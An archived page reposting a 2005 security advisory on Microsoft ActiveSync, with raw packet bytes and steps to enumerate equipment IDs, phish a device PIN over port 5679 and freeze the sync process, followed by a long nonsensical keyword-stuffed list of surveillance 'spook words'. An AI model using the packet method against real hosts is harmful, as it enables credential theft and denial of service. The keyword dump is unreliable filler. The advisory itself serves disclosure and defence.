DonkBoy Internet
Home of the famous
Information Archives.
Terms of use  


*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#*

Title: Microsoft ActiveSync Denial of Service


Release Date: 08/02/2005
Vulnerability Type: Exposure of system information / Exposure of sensitive information / DoS
Severity: Low for denial of service attacks. Medium for password collection attack

Os affected: Windows Mobile Pocket PC 2003
Auth: http://www.microsoft.com



Disclaimer:
==========

The information is provided "as is" without warranty of any kind.
The author of this issue shall not be held liable for any damages due to the informations contained in this advisory.


Vulnerability Description:
=========================

Seth Fogie has reported two vulnerabilities in Microsoft ActiveSync, which can be exploited by malicious people to cause a DoS (Denial of Service) and enumerate valid equipment IDs.

1) It is possible to enumerate valid equipment IDs by examining the response via some specially crafted data sent to port 5679/tcp.

This can further be exploited to trick users into disclosing passwords for mobile devices to malicious people.

2) An error in the communication handling can be exploited to freeze the ActiveSync process by sending multiple initialization requests to port 5679/tcp.

The vulnerabilities have been reported in version 3.7.1. Other versions may also be affected.



Exploit:
========

When a Pocket PC device attempts to sync to a PC, it will send three initial packets to the Active Sync program on port 5679. The following outlines the contents of the packets:

packet1[] = "\x00\x00\x00\x00";
packet2[] = "\x98\x00\x00\x00"; //SIZE OF NEXT PACKET
packet3[] =
"\x28\x00\x00\x00"
"\x04\x15\x40\x04"
"\x11\x0a\x00\x00" //2577 (AUTORUN?)
"\x05\x00\x00\x00"
"\x59\x29\x6d\x46" //EQUIP ID
"\x00\x00\x00\x00"
"\x28\x00\x00\x00" //LINK TO POCKET_PC1 TEXT
"\x3e\x00\x00\x00" //LINK TO POCKETPC TEXT
"\x5c\x00\x00\x00" //LINK TO SSKD TEXT
"\x78\x00\x00\x00" //LINK TO AXIM X50 TEXT
"\x50\x00\x6f\x00" //TEXT IN UNICODE
"\x63\x00\x6b\x00\x65\x00\x74\x00\x5f\x00\x50\x00\x43\x00\x31\x00\x00\x00\x50\x00"
"\x6f\x00\x63\x00\x6b\x00\x65\x00\x74\x00\x50\x00\x43\x00\x00\x00"
"\x53\x00\x53\x00\x44\x00\x4b\x00\x00\x00\x00\x00\x44\x00\x65\x00"
"\x6c\x00\x6c\x00\x20\x00\x41\x00\x78\x00\x69\x00\x6d\x00\x20\x00"
"\x58\x00\x35\x00\x30\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00"
"\x04\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";

If the equipment ID value is valid, the PC will respond with a x12345678. If the equipment ID is not correct, the response will be x03. With this static response, it is trivial to brute force the valid equipment ID value. The reason this is important is because if you change the value in packet1 to x00000001 to the correct corresponding PID, a prompt will appear on the PC asking for a PIN value (figure 1). If a target enters a password, the information will be passed back to the remote, requesting client. If a value other than x01 is sent, that value will be XORed with the response to pseudo-'encrypt' the password. This method of information gathering is possible from over a network and does work over the Internet. From a quick nmap scan, we found about roughly 10 computers with this port open per 50 class C subnets.


Finally, we discovered that if numerous attempts were made to initialize with a PC running Active Sync, after about four attempts the Active Sync process freezes. In addition, if a user attempts to sync while a brute force equipment ID attempt is underway, the sync will usually fail.

Workaround:
Block Internet and LAN access to port 5679 using a firewall until this issue is patched.

Vendor Response
Waiting response.


The fix:
========

No solution exists. Waiting response. 


Credits:
========

Seth Fogie - Airscanner Mobile Security Team

#*#*#*#*#*#*#*#*#* MobiBug Security Mailing List #*#*#*#*#*#*#*#*#*






Friday, January 12, 2007

Home

GoStats stats counter
GoStats stats counter

desktop,free,Samples,New,Demo, Themes,Clipart,Coffee,Hot,Catalogs,Tips,Cosmetics,Pet,Coupons,Contests,Gifts,Java,Games,TShirts,Cool, Homepages,Sweepstakes,Microsoft,Mac,Mousepad,Stickers,Kids,Sweepstakes,Gifts,Freestuff,Freebies, Hot,Prize,Coffee,Free,Samples,Freestuff,Gifts,Email,Win95,Freebies,Prizes,Games,Contests,Prizes, Cool,Contests,$,Software,Freebies,Hot,Demos,Freeware,Prizes,Free,Games,Clipart,Shareware,Webmaster,$, Contests,Graphics,Fonts,fre,frre,Free,Catalogs,Freeware,Freebies,Screensaver,Accessories,Contests,Cash,Free Samples,Freeware, Cool,HTML,WebPromotion,Demos,Wallpaper,Java,Freebies,Games,Contests,Screensavers,Software,Sweepstakes,Midi, [FÓRUM] powered by vBulletin Online diskussioner Registered Members: Total Threads: | Total Posts: Welcome to our newest member web forumi, diskusije Unix, Linux, Networking, C-C++, Perl, Security, Delphi, ASM, Music,Catalogs,Giveaways,Greeting Cards,New,$,Digest,Digests,Games,WallpapePictures,Performance,Tuning,Parts,Gallery,Modified,Aftermarket,Mods,Specs,Used,Demos,Horoscope,$,Sweepstakes,Cosmetics Forum Manners 101 Etiquette Public Relations Advice Customs Social Entertaining tradition, custom iasca sq spl db, convention, manner, telavision practice, observance, ritual, lifestyle, habit, routine, ordinary, holiday, conventional, accustomed, customary, holiday, season, gift, delivery MAYA 3DSAmax 3d studio max tutorials tutorial plugins email mail mailing list lists maillist maillists discussion group groups bulletin board boards forum forums powered by lumasis, internal Combustion, Chalice, Composer, Cineon, FlintFlame/Inferno, After Effects, Maya Fusion, Digital Studio, Avid, Sumatra, 2D News, Artist Gallery, Bookstore, Tutorials, Nothing Real, Silicon Grail, Plugins, Tools, Contests, Jobs, Digital, Polls, AWGUA, Alias|Wavefront, Tips, Tutorials Maya Fusion, Chalice, After Effects, Flame free 2d resource and community website with Tips, Tricks, Tutorials, Scripts, Plugins, Shaders, Tools, Jobs, Contests, Artist Gallery and Listservs Maya, XSI, Jig, Softimage, Alias, Studio, Renderman, Sumatra, 3D, 3dmax 3dsmax discussion boards chat forums chat groups rooms message chats chat discussions online lists icq bulletin support chats of on irc etc gab web the bbs newsgroups chatrooms networking islamic webchat time line zone sites email real mailing chatting writer's chats chat chats gift hosts issues edonkey , Filesharing , Neo-Modus , Morpheus , Windows XP , Mpeg Layer 3, r@dio, I-Drive, Idrive, Freedrive, Getright, Flashget, Go!zilla, Gozialla, Brenner, Clonecd, Nero Burning ROM, Feurio, Rohlinge, CDRWin, WinonCD, Security, Zonealarm, Firewall, Microsoft Office, Visual Basic, Excel, Outlook, Access, Powerpoint, Formel Eins, ferrari, Mc Laren, Mercedes, BMW, Schumacher, Digitale Fotografie, DVD, Handys, Software News, Games, Music, Movies, Cinema, Download Tips und Tricks, Premiere World morpheus forum xp windows 2000 videos filesharing tips downloads surf-ici.com netusa1.net skyenet.comWaihopai, INFOSEC, Information Security, Information Warfare, IW, IS, Priavacy, Information Terrorism, Terrorism Defensive Information, Defense Information Warfare, Offensive Information, Offensive Information Warfare, National Information Infrastructure, InfoSec, Reno, Compsec, Computer Terrorism, Firewalls, Secure Internet Connections, ISS, Passwords, DefCon V, Hackers, Encryption, Espionage, USDOJ, NSA, CIA, S/Key, SSL, FBI, Secert Service, USSS, Defcon, Military, White House, Undercover, NCCS, Mayfly, PGP, PEM, RSA, Perl-RSA, MSNBC, bet, AOL, AOL TOS, CIS, CBOT, AIMSX, STARLAN, 3B2, BITNET, COSMOS, DATTA, E911, FCIC, HTCIA, IACIS, UT/RUS, JANET, JICC, ReMOB, LEETAC, UTU, VNET, BRLO, BZ, CANSLO, CBNRC, CIDA, JAVA, Active X, Compsec 97, LLC, DERA, Mavricks, Meta-hackers, ^?, Steve Case, Tools, Telex, Military Intelligence, Scully, Flame, Infowar, Bubba, Freeh, Archives, Sundevil, jack, Investigation, ISACA, NCSA, spook words, Verisign, Secure, ASIO, Lebed, ICE, NRO, Lexis-Nexis, NSCT, SCIF, FLiR, Lacrosse, Flashbangs, HRT, DIA, USCOI, CID, BOP, FINCEN, FLETC, NIJ, ACC, AFSPC, BMDO, NAVWAN, NRL, RL, NAVWCWPNS, NSWC, USAFA, AHPCRC, ARPA, LABLINK, USACIL, USCG, NRC, ~, CDC, DOE, FMS, HPCC, NTIS, SEL, USCODE, CISE, SIRC, CIM, ISN, DJC, SGC, UNCPCJ, CFC, DREO, CDA, DRA, SHAPE, SACLANT, BECCA, DCJFTF, HALO, HAHO, FKS, 868, GCHQ, DITSA, SORT, AMEMB, NSG, HIC, EDI, SAS, SBS, UDT, GOE, DOE, GEO, Masuda, Forte, AT, GIGN, Exon Shell, CQB, CONUS, CTU, RCMP, GRU, SASR, GSG-9, 22nd SAS, GEOS, EADA, BBE, STEP, Echelon, Dictionary, MD2, MD4, MDA, MYK, 747,777, 767, MI5, 737, MI6, 757, Kh-11, Shayet-13, SADMS, Spetznaz, Recce, 707, CIO, NOCS, Halcon, Duress, RAID, Psyops, grom, D-11, SERT, VIP, ARC, S.E.T. Team, MP5k, DREC, DEVGRP, DF, DSD, FDM, GRU, LRTS, SIGDEV, NACSI, PSAC, PTT, RFI, SIGDASYS, TDM. SUKLO, SUSLO, TELINT, TEXTA. ELF, LF, MF, VHF, UHF, SHF, SASP, WANK, Colonel, domestic disruption, smuggle, 15kg, nitrate, Pretoria, M-14, enigma, Bletchley Park, Clandestine, nkvd, argus, afsatcom, CQB, NVD, Counter Terrorism Security, Rapid Reaction, Corporate Security, Police, sniper, PPS, ASIS, ASLET, TSCM, Security Consulting, High Security, Security Evaluation, Electronic Surveillance, MI-17, Counterterrorism, spies, eavesdropping, debugging, interception, COCOT, rhost, rhosts, SETA, Amherst, Broadside, Capricorn, Gamma, Gorizont, Guppy, Ionosphere, Mole, Keyhole, Kilderkin, Artichoke, Badger, Cornflower, Daisy, Egret, Iris, Hollyhock, Jasmine, Juile, Vinnell, B.D.M.,Sphinx, Stephanie, Reflection, Spoke, Talent, Trump, FX, FXR, IMF, POCSAG, Covert Video, Intiso, r00t, lock picking, Beyond Hope, csystems, passwd, 2600 Magazine, Competitor, EO, Chan, Alouette,executive, Event Security, Mace, Cap-Stun, stakeout, ninja, ASIS, ISA, EOD, Oscor, Merlin, NTT, SL-1, Rolm, TIE, Tie-fighter, PBX, SLI, NTT, MSCJ, MIT, 69, RIT, Time, MSEE, Cable & Wireless, CSE, Embassy, ETA, Porno, Fax, finks, Fax encryption, white noise, pink noise, CRA, M.P.R.I., top secret, Mossberg, 50BMG, Macintosh Security, Macintosh Internet Security, Macintosh Firewalls, Unix Security, VIP Protection, SIG, sweep, Medco, TRD, TDR, sweeping, TELINT, Audiotel, Harvard, 1080H, SWS, Asset, Satellite imagery, force, Cypherpunks, Coderpunks, TRW, remailers, replay, redheads, RX-7, explicit, FLAME, Pornstars, AVN, Playboy, Anonymous, Sex, chaining, codes, Nuclear, 20, subversives, SLIP, toad, fish, data havens, unix, c, a, b, d, the, Elvis, quiche, DES, 1*, NATIA, NATOA, sneakers, counterintelligence, industrial espionage, PI, TSCI, industrial intelligence, H.N.P., Juiliett Class Submarine, Locks, loch, Ingram Mac-10, sigvoice, ssa, E.O.D., SEMTEX, penrep, racal, OTP, OSS, Blowpipe, CCS, GSA, Kilo Class, squib, primacord, RSP, Becker, Nerd, fangs, Austin, Comirex, GPMG, Speakeasy, humint, GEODSS, SORO, M5, ANC, zone, SBI, DSS, S.A.I.C., Minox, Keyhole, SAR, Rand Corporation, Wackenhutt, EO, Wackendude, mol, Hillal, GGL, CTU, botux, Virii, CCC, Blacklisted 411, Internet Underground, XS4ALL, Retinal Fetish, Fetish, Yobie, CTP, CATO, Phon-e, Chicago Posse, l0ck, spook keywords, PLA, TDYC, W3, CUD, CdC, Weekly World News, Zen, World Domination, Dead, GRU, M72750, Salsa, 7, Blowfish, Gorelick, Glock, Ft. Meade, press-release, Indigo, wire transfer, e-cash, Bubba the Love Sponge, Digicash, zip, SWAT, Ortega, PPP, crypto-anarchy, AT&T, SGI, SUN, MCI, Blacknet, Middleman, KLM, Blackbird, plutonium, Texas, jihad, SDI, Uzi, Fort Meade, supercomputer, bullion, 3, Blackmednet, Propaganda, ABC, Satellite phones, Planet-1, cryptanalysis, nuclear, FBI, Panama, fissionable, Sears Tower, NORAD, Delta Force, SEAL, virtual, Dolch, secure shell, screws, Black-Ops, Area51, SABC, basement, data-haven, black-bag, TEMPSET, Goodwin, rebels, ID, MD5, IDEA, garbage, market, beef, Stego, unclassified, utopia, orthodox, Alica, SHA, Global, gorilla, Bob, Pseudonyms, MITM, Gray Data, VLSI, mega, Leitrim, Yakima, Sugar Grove, Cowboy, Gist, 8182, Gatt, Platform, 1911, Geraldton, UKUSA, veggie, 3848, Morwenstow, Consul, Oratory, Pine Gap, Menwith, Mantis, DSD, BVD, 1984, Flintlock, cybercash, government, hate, speedbump, illuminati, president, freedom, cocaine, $, Roswell, ESN, COS, E.T., credit card, b9, fraud, assasinate, virus, anarchy, rogue, mailbomb, 888, Chelsea, 1997, Whitewater, MOD, York, plutonium, William Gates, clone, BATF, SGDN, Nike, Atlas, Delta, TWA, Kiwi, PGP 2.6.2., PGP 5.0i, PGP 5.1, siliconpimp, Lynch, 414, Face, Pixar, IRIDF, eternity server, Skytel, Yukon, Templeton, LUK, Cohiba, Soros, Standford, niche, 51, H&K, USP, ^, sardine, bank, EUB, USP, PCS, NRO, Red Cell, Glock 26, snuffle, Patel, package, ISI, INR, INS, IRS, GRU, RUOP, GSS, NSP, SRI, Ronco, Armani, BOSS, Chobetsu, FBIS, BND, SISDE, FSB, BfV, IB, froglegs, JITEM, SADF, advise, TUSA, HoHoCon, SISMI, FIS, MSW, Spyderco, UOP, SSCI, NIMA, MOIS, SVR, SIN, advisors, SAP, OAU, PFS, Aladdin, chameleon man, Hutsul, CESID, Bess, rail gun, Peering, 17, 312, NB, CBM, CTP, Sardine, SBIRS, SGDN, ADIU, DEADBEEF, IDP, IDF, Halibut, SONANGOL, Flu, &, Loin, PGP 5.53, EG&G, AIEWS, AMW, WORM, MP5K-SD, 1071, WINGS, cdi, DynCorp, UXO, Ti, THAAD, package, chosen, PRIME, SURVIAC